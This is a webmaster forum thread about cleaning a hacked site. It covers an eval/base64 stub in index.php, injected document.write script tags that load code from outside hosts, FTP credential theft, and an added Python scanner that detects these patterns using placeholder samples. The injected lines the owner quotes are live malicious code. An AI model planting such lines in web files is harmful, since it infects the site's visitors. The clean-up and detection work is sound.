Hi,
Yesterday I received an email from Google that my website irfanbukhari.com is reported as malware. When I checked through Firefox (I have a script blocker) I could see jn06.nl listed in the blocked sites list. So I downloaded my index.php file and I saw that it had some code added at the beginning in PHP tags. It was encoded, so I don't really know what it was. So I removed the code and uploaded the file again. I also asked Google to recheck it. But this morning when I opened my site again I could see the same site jn06.nl in my script blocker list. Please tell me how I can get rid of this. Thanks.
In addition to removing the malicious code, it is necessary to discover how the hacker got access to your server to put the code there. If you don’t close the security hole, they’ll add malicious code over and over again. These two articles will help, and the others that they link to give background information if you need to understand the situation better:
How to prevent your site from getting hacked, repair damaged site. Website security precautions:
http://25yearsofprogramming.com/blog/20070705.htm
How to remove ‘This site may harm your computer’ from your website’s Google results:
http://25yearsofprogramming.com/blog/20071223.htm
Chances are the php code you found at the beginning of the file was only the infection method, not necessarily the infection itself.
Recently, I’ve been seeing more and more sites with .php files where the remote control code has been placed at the first line, usually before the original opening php tag.
The code you found probably started with:
<?php eval(base64_decode('aWYo
this typically is used to re-infect sites with malscripts found elsewhere.
Some of the most common places hackers are injecting their malscripts are:
Index files (this includes .php, .html, .htm, .whatever)
Look both before and after the opening body tag. It may be on the same line as the opening body tag.
Look at the very end of the file. Many times I’m seeing malscripts injected after the closing html tag.
Once you find one file with the malscript, check files modified around the same date and time too. Although I just wrote a blog post about this:
http://www.wewatchyourwebsite.com/wordpress/?p=305
but checking for files modified around the same time may at least give you a jump start.
Let the forum here know what you find please.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Thanks a lot Steve and WeWatch. Your links actually did help me find out what was wrong. You were right, the eval thingy in the beginning of the file wasn't the only problem. I had
document.write('<script src=http://teessidetrailerhire.co.uk/images/google37c8afdcff39305a.php ><\/script>');
document.write('<script src=http://teessidetrailerhire.co.uk/images/google37c8afdcff39305a.php ><\/script>');
document.write('<script src=http://teessidetrailerhire.co.uk/images/google37c8afdcff39305a.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
document.write('<script src=http://jn06.nl/countdown/wp-config.php ><\/script>');
This code was included in my jQuery JS file and the tooltip (jQuery plugin) JS file. Now I have removed it. But I still don't know for sure how this was added. I think someone hacked into my blog (WordPress... removed it now) and through comments somehow got all this done, because I have been receiving emails of dummy comments. But it's a wild guess.
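Added example, not posted by anyone in this thread: a small defensive scanner that implements Thomas's advice from the earlier reply (look for the eval/base64_decode stub prepended to .php files, look for injected script tags in index and .js files, then list files modified around the same time as a known-infected file) and also catches the document.write lines shown in the post above. The site tree it scans is constructed inside the script with placeholder hostnames and made-up payloads; point scan_tree and modified_near at a downloaded copy of a real site to use it for a clean-up.

```python
"""Defensive scanner for the two injection patterns described in this thread
(an eval(base64_decode(...)) stub prepended to .php files and document.write
lines pulling a remote <script src=...> into .js/.html files), plus the
'files modified around the same date and time' check. Sample files are
constructed here; no real site is touched."""
import os
import re
import tempfile
import time

# Signatures for the injection styles discussed in the thread (case-insensitive).
SIGNATURES = {
    "php_eval_base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    # [\x22\x27] = a double or single quote right before the <script tag
    "js_docwrite_script": re.compile(
        rb"document\.write\s*\(\s*[\x22\x27]<script\s+src=", re.I),
}
SCAN_EXT = {".php", ".html", ".htm", ".js"}


def scan_file(path):
    """Return the names of every signature found in one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [name for name, rx in SIGNATURES.items() if rx.search(data)]


def scan_tree(root):
    """Return {relative path: [signature names]} for every flagged file."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in SCAN_EXT:
                continue
            full = os.path.join(dirpath, fn)
            found = scan_file(full)
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits


def modified_near(root, reference_path, window_seconds=3600):
    """Files under root (any extension) whose mtime lies within window_seconds
    of reference_path's mtime: the 'modified around the same date and time'
    check from the thread, as a starting list for manual review."""
    ref_mtime = os.path.getmtime(reference_path)
    ref_abs = os.path.abspath(reference_path)
    near = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            if os.path.abspath(full) == ref_abs:
                continue
            if abs(os.path.getmtime(full) - ref_mtime) <= window_seconds:
                near.append(os.path.relpath(full, root))
    return sorted(near)


def build_sample_site(root=None):
    """Write a constructed site tree (placeholder hostname malicious.example,
    made-up base64 payload) and return its root. mtimes are set explicitly so
    the timing check is deterministic: three files share one timestamp, two
    are days older."""
    root = root or tempfile.mkdtemp()
    now = time.time()
    files = {
        # eval stub prepended before the real opening tag, as in the thread
        "index.php": (b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>"
                      b"<?php echo 'real page'; ?>\n", now),
        # remote script injected into a plugin .js file (placeholder host)
        os.path.join("js", "jquery.js"): (
            b"function tip(){}\n"
            b"document.write('<script src=http://malicious.example/x.php >"
            b"<\\/script>');\n", now),
        "style.css": (b"body{margin:0}\n", now),
        "clean.php": (b"<?php echo 'ok'; ?>\n", now - 2 * 86400),
        "old.txt": (b"notes\n", now - 3 * 86400),
    }
    for rel, (content, mtime) in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
        os.utime(full, (mtime, mtime))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, sigs in scan_tree(site).items():
        print(f"FLAGGED {rel}: {', '.join(sigs)}")
    for rel in modified_near(site, os.path.join(site, "index.php")):
        print(f"modified near index.php: {rel}")
```

The timing check deliberately looks at every file, not only scripts, because the same upload session that drops the eval stub often touches other files too; treat its output as a review list, not as a verdict.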
If you think it’s WordPress, are you fully updated? There’s a new version out, 2.8.6. Unless you’re running an older version, I don’t think it’s WordPress. Are you using the WordPress SPAM plugin?
Typically this type of attack starts with stolen FTP login credentials. Someone with FTP access to the infected website has a virus on their PC. The virus/trojan is designed to steal FTP login credentials.
You can read Denis’ excellent write-up about various FTP programs that allow hackers to easily steal this information. His blog post is here:
I’ve also seen where these viruses/trojans will “sniff” the outgoing FTP traffic. Since FTP transmits all data in plain text, it’s easy for the virus to steal the FTP login credentials this way.
So, please don’t be in denial: change all FTP passwords immediately, then scan all PCs with FTP access for viruses. Sometimes the viruses/trojans learn how to evade detection by the currently installed anti-virus program. This means you’ll have to install something different.
Many have had good success with AVG, Avast or Avira. Use one of these with Malwarebytes and you should be able to find and remove any viruses.
Please post back here with what you used to remove the viruses and what was found. That way others who read this thread will learn as well.
If you have further questions, please post back here and someone will help you.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
